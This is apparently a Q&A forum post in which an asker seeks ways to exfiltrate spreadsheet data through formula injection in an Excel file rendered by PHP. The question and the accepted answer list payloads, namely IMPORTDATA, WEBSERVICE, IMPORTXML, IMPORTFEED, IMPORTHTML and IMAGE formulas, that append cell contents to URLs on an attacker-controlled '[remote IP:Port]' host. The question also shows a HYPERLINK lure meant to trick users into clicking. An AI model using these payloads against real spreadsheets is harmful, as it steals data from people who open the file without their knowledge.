# Exfiltrate data by injecting functions in Excel 2007 file rendered with PHP

Tags: injection, office, exfiltration, excel

I need to extract data from inside an Excel fille using Excel 2007 functions.

The concept is somewhat related to stored XSS type of data exfiltration only that I need to use Excel 2007 functions (which I managed to inject in the file cells) in order to make the user automatically load an image, web path or make a DNS request.

Until now I have tried the followings but they failed because the Excel file is rendered in PHP with Excel 2007 functions:

- `=IMPORTDATA(CONCATENATE("https://example.com/", C2))`
- `=WEBSERVICE(CONCATENATE("https://example.com/", C2))`

I have successfully injected:

- `=HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")`

But in this manner I have to trick a user to open the link by itself (not impossible, but no fun :D).

Answer (score 1, accepted):

After a few trials and errors, I have manage to extract data but also I find the following article one of the most comprehensive reaource for data exfiltration using excel formula:

https://www.notsosecure.com/data-exfiltration-formula-injection/

**CONCATENATE: Appends strings to one another.**

=CONCATENATE(A2:E2)

**IMPORTXML: Imports data from various structured data types including XML, HTML, CSV, TSV, and RSS and ATOM XML feeds.**

=IMPORTXML(CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)), "//a/a10")

**IMPORTFEED: Imports a RSS or ATOM feed.**

=IMPORTFEED(CONCAT("http://[remote IP:Port]//123.txt?v=", CONCATENATE(A2:E2)))

**IMPORTHTML: Imports data from a table or list within an HTML page.**

=IMPORTHTML (CONCAT("http://[remote IP:Port]/123.txt?v=", CONCATENATE(A2:E2)),"table",1)

**IMPORTRANGE: Imports a range of cells from a specified spreadsheet.**

=IMPORTRANGE("https://docs.google.com/spreadsheets/d/[Sheet_Id]", "sheet1!A2:E2")

**IMAGE: Inserts an image into a cell.**

=IMAGE("https://[remote IP:Port]/images/srpr/logo3w.png")